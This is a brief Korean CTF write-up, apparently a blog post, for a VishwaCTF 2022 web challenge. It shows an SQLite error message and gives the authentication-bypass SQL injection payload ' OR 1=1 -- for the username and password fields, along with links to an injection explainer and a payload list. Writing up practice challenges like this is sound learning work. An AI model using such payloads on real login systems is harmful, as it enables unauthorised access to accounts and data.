2022. 3. 31. 23:32ㆍCTF_Writeup/웹 web
문제URL : https://my-us3l355-w3b51t3.vishwactf.com/
Admin Login
my-us3l355-w3b51t3.vishwactf.com
문제설명
I made this website having simple authentication used in it. But unfortunately I forgot the credentials. Can you help me to find the correct one ?
이 문제의 경우 SQL 삽입공격을 사용하면 간단하게 해결된다.
SQL Injection 이란? (SQL 삽입 공격) — 보안과 개발을 다 하고싶은 욕심쟁이 (tistory.com)
SQL Injection 이란? (SQL 삽입 공격)
1. SQL Injection 1.1 개요 SQL Injection SQL Injection 이란 악의적인 사용자가 보안상의 취약점을 이용하여, 임의의 SQL 문을 주입하고 실행되게 하여 데이터베이스가 비정상적인 동작을 하도록 조작
noirstar.tistory.com
Warning
: SQLite3::query(): Unable to prepare statement: 1, near "or": syntax error in
/opt/app-root/src/index.php
on line
55
Fatal error
: Uncaught Error: Call to a member function fetchArray() on bool in /opt/app-root/src/index.php:56 Stack trace: #0 {main} thrown in
/opt/app-root/src/index.php
on line
56GitHub - payloadbox/sql-injection-payload-list: 🎯 SQL Injection Payload List
🎯 SQL Injection Payload List. Contribute to payloadbox/sql-injection-payload-list development by creating an account on GitHub.
github.com
User: ' OR 1=1 --
Pass: ' OR 1=1 --
'CTF_Writeup > 웹 web' 카테고리의 다른 글
| [ImaginaryCTF 2022] hidden, mass write up (0) | 2022.07.31 |
|---|---|
| 2022 VishwaCTF Writeup_ Hey Buddy(Web) (0) | 2022.03.31 |